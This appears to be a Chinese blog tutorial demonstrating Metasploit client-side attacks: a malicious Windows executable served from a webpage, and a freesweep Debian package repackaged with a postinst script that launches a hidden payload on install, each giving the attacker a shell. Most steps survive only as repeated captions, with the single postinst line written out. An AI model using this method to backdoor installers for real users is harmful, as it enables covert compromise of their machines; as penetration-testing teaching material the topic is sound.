msf客户端渗透(一):payload利用简单示范

针对Windows

msf客户端渗透(一):payload利用简单示范

msf客户端渗透(一):payload利用简单示范

msf客户端渗透(一):payload利用简单示范

msf客户端渗透(一):payload利用简单示范

开启侦听

msf客户端渗透(一):payload利用简单示范

 

查看payload选项

msf客户端渗透(一):payload利用简单示范

msf客户端渗透(一):payload利用简单示范

 将1.exe传到网页上

msf客户端渗透(一):payload利用简单示范

win7访问网页并下载1.exe

msf客户端渗透(一):payload利用简单示范

 

下载好之后双击运行,在服务器端就获得了一个shell

 msf客户端渗透(一):payload利用简单示范

 

 

针对linux

先获取到一个软件包

在/var/cache/apt/archives目录下查看下载的安装包

msf客户端渗透(一):payload利用简单示范

将这个安装包拷贝到home目录下,解包到free目录下

msf客户端渗透(一):payload利用简单示范

msf客户端渗透(一):payload利用简单示范

创建一个目录

msf客户端渗透(一):payload利用简单示范

创建control文件

msf客户端渗透(一):payload利用简单示范

输入以下内容

msf客户端渗透(一):payload利用简单示范

创建一个postinst文件

msf客户端渗透(一):payload利用简单示范

输入以下内容

#!/bin/sh

sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &

给postinst脚本增加执行权限

msf客户端渗透(一):payload利用简单示范

准备payload

msf客户端渗透(一):payload利用简单示范

打包 

msf客户端渗透(一):payload利用简单示范

上传到网页上

msf客户端渗透(一):payload利用简单示范

修改

msf客户端渗透(一):payload利用简单示范

开启msf侦听

msf客户端渗透(一):payload利用简单示范

 

 

 

被攻击主机再这个网页上下载这个文件

msf客户端渗透(一):payload利用简单示范

当被攻击主机执行安装时

 msf客户端渗透(一):payload利用简单示范

攻击主机就获取到了一个shell

msf客户端渗透(一):payload利用简单示范

 

相关文章:

  • 2022-12-23
  • 2021-06-18
  • 2021-05-20
  • 2021-07-20
  • 2021-12-01
  • 2021-10-10
  • 2021-06-12
  • 2022-02-08
猜你喜欢
  • 2021-05-18
  • 2021-09-02
  • 2021-08-07
  • 2022-12-23
  • 2022-01-09
  • 2021-11-28
  • 2021-08-18
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode